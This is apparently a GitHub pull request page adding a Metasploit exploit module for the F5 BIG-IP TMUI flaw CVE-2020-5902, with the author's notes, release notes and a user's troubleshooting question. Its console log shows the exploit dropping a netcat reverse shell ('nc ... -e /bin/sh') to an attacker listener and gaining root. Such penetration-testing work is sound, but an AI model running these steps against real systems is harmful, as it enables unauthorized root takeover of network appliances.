Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) #13807

Merged
merged 10 commits into from Jul 7, 2020

@wvu wvu commented Jul 5, 2020

Merged: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

If you're coming here from the Internet, please use the version in master (linked above), not the original commit. Thank you! See also: #13854 and #14003.

This module should get you a Unix root shell on an affected F5 BIG-IP if all goes well. This is NOT TMSH. It just goes through it. You may need to run the exploit a couple times until I fix the bugs.

msf5 exploit(linux/http/f5_bigip_tmui_rce) > run

[+] nc 172.16.163.1 4444 -e /bin/sh
[*] Started reverse TCP handler on 172.16.163.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Target is running BIG-IP 14.1.2.
[*] Creating alias list=bash
[+] Successfully created alias list=bash
[*] Executing Unix Command for cmd/unix/reverse_netcat_gaping
[*] Executing command: nc 172.16.163.1 4444 -e /bin/sh
[*] Uploading /tmp/VaU9ShHKR9vSa4U2q87Tio
[+] Successfully uploaded /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Executing /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Command shell session 1 opened (172.16.163.1:4444 -> 172.16.163.145:39434) at 2020-07-07 12:11:02 -0500
[+] Deleted /tmp/VaU9ShHKR9vSa4U2q87Tio
[*] Deleting alias list=bash
[+] Successfully deleted alias list=bash

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
uname -a
Linux localhost.localdomain 3.10.0-514.26.2.el7.ve.x86_64 #1 SMP Wed Aug 7 08:16:38 PDT 2019 x86_64 x86_64 x86_64 GNU/Linux

@wvu wvu added delayed feature needs-docs external modules labels Jul 5, 2020
label-actions bot commented Jul 5, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@wvu wvu marked this pull request as draft Jul 5, 2020
@wvu wvu removed the needs-docs label Jul 6, 2020
@wvu wvu marked this pull request as ready for review Jul 7, 2020
@wvu wvu changed the title [WIP] Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Add F5 BIG-IP TMUI Directory Traversal and File Upload RCE (CVE-2020-5902) Jul 7, 2020
@wvu wvu removed the delayed label Jul 7, 2020
@wvu wvu added module and removed external modules labels Jul 7, 2020
@smcintyre-r7 smcintyre-r7 self-assigned this Jul 7, 2020
@smcintyre-r7 smcintyre-r7 merged commit 16ff439 into rapid7:master Jul 7, 2020
3 checks passed
smcintyre-r7 commented Jul 7, 2020

Release Notes

The F5 BIG-IP TMUI Directory Traversal and File Upload RCE module exploits a directory traversal vulnerability within the F5 BIG-IP appliance, identified as CVE-2020-5902. The vulnerability is unauthenticated and can be leveraged to obtain remote code execution.

@wvu wvu deleted the feature/f5 branch Jul 7, 2020
@tperry-r7 tperry-r7 added the rn-modules label Jul 9, 2020
@wvu wvu added the docs label Jul 17, 2020
hackercoolmagz commented Sep 18, 2020

I am getting stuck at

[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash
[-] Encountered java.lang.NullPointerException, retrying!
[*] Creating alias list=bash

while running the exploit. Any solution please. I have used the exact payload and set the target to 0 (Unix).

Labels
docs feature module rn-modules